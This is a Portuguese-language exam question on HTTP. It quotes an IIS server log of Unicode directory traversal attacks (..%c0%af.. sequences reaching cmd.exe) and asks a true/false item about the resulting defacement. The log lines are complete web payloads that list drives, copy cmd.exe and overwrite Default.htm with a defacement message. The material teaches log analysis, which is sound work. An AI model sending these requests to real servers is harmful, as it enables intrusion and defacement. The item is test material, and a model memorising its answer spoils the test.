Informática Redes de Computadores Modelo OSI/ISO Camadas e Protocolos Camada de Aplicação HTTP (HYPER TEXT TRANSFER PROTOCOL)

Texto CE – questões de 36 a 38


Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.


atacker1.nowhere.com - - [01/Nov/2000:18:20:49 +0000] "GET

/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 306

atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET

/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344

atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET

/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c

0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 346

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET

/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/

winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 342

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET /cgibin/..%

c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi

nnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET

/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0

%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 345

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET

/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344

atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461

atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461

atacker4.nowhere.com - - [22/Jan/2001:21:19:27 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 607

atacker4.nowhere.com - - [22/Jan/2001:21:19:49 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:d:\ HTTP/1.0" 502 283

atacker4.nowhere.com - - [22/Jan/2001:21:20:08 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+d:\ HTTP/1.0" 200 342

atacker4.nowhere.com - - [22/Jan/2001:21:20:25 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+e:\ HTTP/1.0" 200 543

atacker5.nowhere.com - - [23/Jan/2001:04:28:41 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 200 607

atacker5.nowhere.com - - [23/Jan/2001:04:29:00 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub HTTP/1.1" 200 493

atacker5.nowhere.com - - [23/Jan/2001:04:29:06 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot HTTP/1.1" 200 828

atacker6.nowhere.com - - [23/Jan/2001:04:30:02 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\s3.exe

HTTP/1.0" 502 259

atacker6.nowhere.com - - [23/Jan/2001:04:32:29 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\cmd.exe

HTTP/1.0" 502 259

atacker6.nowhere.com - - [23/Jan/2001:04:33:36 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\s3.exe

HTTP/1.0" 502 242

atacker6.nowhere.com - - [23/Jan/2001:04:34:11 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1

th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87

atacker6.nowhere.com - - [23/Jan/2001:04:34:28 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1

th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87

atacker6.nowhere.com - - [23/Jan/2001:04:35:55 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1t

h+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 404 461

atacker6.nowhere.com - - [23/Jan/2001:04:37:34 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215

atacker6.nowhere.com - - [23/Jan/2001:04:40:09 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215

atacker6.nowhere.com - - [23/Jan/2001:04:40:30 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215

atacker4.nowhere.com - - [23/Jan/2001:04:40:51 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880

atacker6.nowhere.com - - [23/Jan/2001:04:44:38 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215


Ainda com base no texto CE, julgue os itens subseqüentes, relativos ao servidor http e aos ataques ocorridos.

A página vulnerada se apresentou em branco com os dizeres "H4ck3d by Gund3R0th thanks Gund3R1th Grup WebQu33R".

  • C. Certo
  • E. Errado